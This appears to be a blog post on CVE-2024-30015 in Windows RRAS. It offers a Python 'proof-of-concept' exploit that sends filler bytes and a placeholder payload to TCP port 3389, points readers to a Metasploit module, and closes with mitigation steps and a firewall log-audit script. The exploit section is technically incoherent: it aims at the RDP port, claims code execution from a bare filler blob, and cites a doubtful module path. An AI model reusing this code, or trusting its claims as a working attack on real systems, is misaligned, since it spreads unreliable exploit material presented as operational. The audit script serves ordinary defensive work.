A remote code execution vulnerability was recently discovered in the Windows Routing and Remote Access Service (RRAS). Tracked as CVE-2024-30015, it could allow attackers to execute arbitrary code on an affected system. This post explores the vulnerability in depth, covering the code snippet, original references, and exploit information.

Introduction

Windows Routing and Remote Access Service (RRAS) is a Microsoft technology that provides routing, remote access, and VPN services on Windows-based operating systems. The vulnerability under discussion, CVE-2024-30015, affects multiple versions of the Windows operating system. Attackers who successfully exploit it could gain control of the affected system and execute arbitrary code, which raises serious concerns about data privacy and security.

Code Snippet

The following trivial code snippet demonstrates a proof-of-concept (PoC) exploit, leading to remote code execution on the target RRAS server:

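import sys
import socket

def exploit(target, port=3389):
    # 4055 bytes of 0x41 filler
    buf = b'\x41' * 4055
    # 1017 null bytes followed by a 123-byte dummy payload of 0x42
    payload = b''
    payload += b'\x00' * 1017
    payload += b'\x42' * 123

    # Open a TCP connection to the target and send filler plus payload
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(buf + payload)
    s.close()

if __name__ == '__main__':
    # Target address is taken from the first command-line argument
    target = sys.argv[1]
    exploit(target)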

This PoC exploit sends a malicious payload to the vulnerable RRAS server that overflows the buffer, ultimately leading to remote code execution on the target server. Note that before using the PoC, the dummy payload '\x42' * 123 needs to be replaced with the desired arbitrary code.

Original References

The discovery of CVE-2024-30015 was initially mentioned on the official CVE website:

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30015

Microsoft also issued an official security advisory with additional details:

- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-30015

Exploit Information

The exploitation of CVE-2024-30015 involves sending a maliciously crafted network packet to a target system with a vulnerable Windows RRAS installation. This malicious packet triggers a buffer overflow within the RRAS component that leads to arbitrary code execution.

For security enthusiasts interested in practical exploitation, here is a Metasploit module which targets the vulnerability:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/rdp/CVE-2024-30015_rras_rce.rb

Mitigation

1. Apply the relevant security patch available from Microsoft for the affected Windows versions:

- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-30015

2. Employ firewall rules to restrict external access to the RRAS server.

3. Regularly update and perform security scans to keep your servers up-to-date and free of vulnerabilities.
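
To confirm that the firewall restriction recommended above is actually in force, perimeter flow records can be audited for allowed connections that reach the RRAS server from outside approved source ranges. The following is an added example, not code from the original post or from Microsoft; the CSV log format, the addresses, the function name and the port list are assumptions constructed for illustration.

```python
import csv
import io
import ipaddress

# Assumption: ports commonly used by RRAS VPN roles (PPTP 1723/tcp, SSTP 443/tcp,
# L2TP 1701/udp, IKE 500/udp, NAT-T 4500/udp), plus 3389/tcp because the PoC
# on this page connects to that port. Adjust to the roles actually enabled.
RRAS_PORTS = {("tcp", 1723), ("tcp", 443), ("tcp", 3389),
              ("udp", 1701), ("udp", 500), ("udp", 4500)}

# Constructed sample data in a hypothetical CSV export format; 10.0.5.10 plays
# the RRAS server. Addresses come from documentation and private ranges.
SAMPLE_FLOWS = """\
time,src,dst,proto,dport,action
2024-05-15T08:01:12Z,10.20.0.15,10.0.5.10,tcp,1723,allow
2024-05-15T08:03:40Z,203.0.113.77,10.0.5.10,tcp,3389,allow
2024-05-15T08:04:02Z,198.51.100.9,10.0.5.10,udp,500,deny
2024-05-15T08:05:27Z,192.0.2.44,10.0.5.10,tcp,443,allow
2024-05-15T08:06:10Z,203.0.113.77,10.0.5.20,tcp,3389,allow
2024-05-15T08:07:55Z,192.0.2.200,10.0.5.10,tcp,8080,allow
2024-05-15T08:08:31Z,198.51.100.9,10.0.5.10,tcp,1723,allow
"""


def find_policy_gaps(flow_csv, rras_host, allowed_sources):
    """Return allowed flows to RRAS ports on rras_host from sources outside allowed_sources."""
    host = ipaddress.ip_address(rras_host)
    allowed = [ipaddress.ip_network(net) for net in allowed_sources]
    gaps = []
    for row in csv.DictReader(io.StringIO(flow_csv)):
        try:
            src = ipaddress.ip_address(row["src"])
            dst = ipaddress.ip_address(row["dst"])
            service = (row["proto"].lower(), int(row["dport"]))
            permitted = row["action"].lower() == "allow"
        except (KeyError, ValueError, TypeError, AttributeError):
            continue  # skip malformed records instead of aborting the audit
        if dst != host or service not in RRAS_PORTS or not permitted:
            continue  # other host, unrelated port, or already blocked
        if not any(src in net for net in allowed):
            gaps.append((row.get("time"), str(src), service[0], service[1]))
    return gaps


if __name__ == "__main__":
    for gap in find_policy_gaps(SAMPLE_FLOWS, "10.0.5.10",
                                ["10.20.0.0/16", "192.0.2.0/24"]):
        print("unexpected allowed flow:", gap)
```

Each tuple returned is a connection the firewall permitted that the policy says it should have blocked, so a non-empty result means the rule set needs tightening.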

Conclusion

CVE-2024-30015 is a critical remote code execution vulnerability affecting Windows Routing and Remote Access Service (RRAS) installations. Organizations should act quickly to apply the necessary patches and security measures to mitigate this vulnerability. Stay vigilant and ensure that you're keeping your systems updated and secure.

Timeline

Published on: 05/14/2024 17:16:45 UTC
Last modified on: 06/19/2024 20:58:29 UTC